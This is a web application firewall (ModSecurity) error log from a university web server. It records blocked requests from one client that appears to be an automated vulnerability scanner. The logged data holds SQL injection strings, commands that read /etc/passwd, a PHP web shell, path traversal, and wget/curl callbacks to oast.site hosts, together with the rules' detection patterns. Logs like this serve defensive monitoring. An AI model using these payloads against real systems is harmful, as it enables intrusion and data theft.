[Tue Aug 29 11:34:33.365238 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAShCYkAAAAi"]
[Tue Aug 29 11:34:34.325318 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WsCo-f0AAATOA9IAAAAH"]
[Tue Aug 29 11:34:34.415074 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WsCo-f0AAAQKOvIAAAAs"]
[Tue Aug 29 11:34:35.334759 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUdm24AAABS"]
[Tue Aug 29 11:34:35.336117 2023] [:error] [pid 1311] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUfi8UAAABU"]
[Tue Aug 29 11:34:35.348380 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAATPtQoAAAAM"]
[Tue Aug 29 11:34:35.356537 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUDQSMAAAA7"]
[Tue Aug 29 11:34:35.363131 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUdm28AAABS"]
[Tue Aug 29 11:34:36.335236 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11XMCo-f0AAAUR83IAAABI"]
[Tue Aug 29 11:34:37.301307 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAUMVMMAAABE"]
[Tue Aug 29 11:34:37.308699 2023] [:error] [pid 1311] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAUfi8cAAABU"]
[Tue Aug 29 11:34:37.309364 2023] [:error] [pid 1249] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAATh0AcAAAAm"]
[Tue Aug 29 11:34:37.327589 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAASI0DYAAAAG"]
[Tue Aug 29 11:34:37.336896 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAT9POMAAAA1"]
[Tue Aug 29 11:34:38.308361 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAUZcEkAAABO"]
[Tue Aug 29 11:34:38.311151 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlg3ujtfuybyiqxq.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAATSkm4AAAAT"]
[Tue Aug 29 11:34:38.315512 2023] [:error] [pid 1304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgzph86ufacx15y.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAUYm8EAAABN"]
[Tue Aug 29 11:34:38.317457 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlg1o6cs8r78tmrd.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAAUB01AAAAA5"]
[Tue Aug 29 11:34:38.322344 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAATTmRQAAAAV"]
[Tue Aug 29 11:34:38.325315 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgu5bpjwzdeaust.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAARdiR0AAAAK"]
[Tue Aug 29 11:34:38.327111 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAATUxQIAAAAW"]
[Tue Aug 29 11:34:38.327802 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlghome19dpctjtm.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAATzVHoAAAAx"]
[Tue Aug 29 11:34:38.331198 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgqw6oh6mnezjbh.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAULx7cAAABD"]
[Tue Aug 29 11:34:38.331573 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAUDQSUAAAA7"]
[Tue Aug 29 11:34:38.331726 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlg9fpdeckgjcobr.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAUNaj0AAABF"]
[Tue Aug 29 11:34:38.331883 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgey9o6j15okn69.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAATlLEIAAAAq"]
[Tue Aug 29 11:34:38.334462 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgbnppedr5rtki3.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAATZp5UAAAAf"]
[Tue Aug 29 11:34:38.357774 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAQKOvMAAAAs"]
[Tue Aug 29 11:34:38.439324 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgogftcnmhx7r3a.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAASI0DgAAAAG"]
[Tue Aug 29 11:34:39.364553 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11X8Co-f0AAATmZcsAAAAr"]
[Tue Aug 29 11:34:39.369373 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgjzf8q6q7mom5h.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/upload"] [unique_id "ZO11X8Co-f0AAAQKOvQAAAAs"]
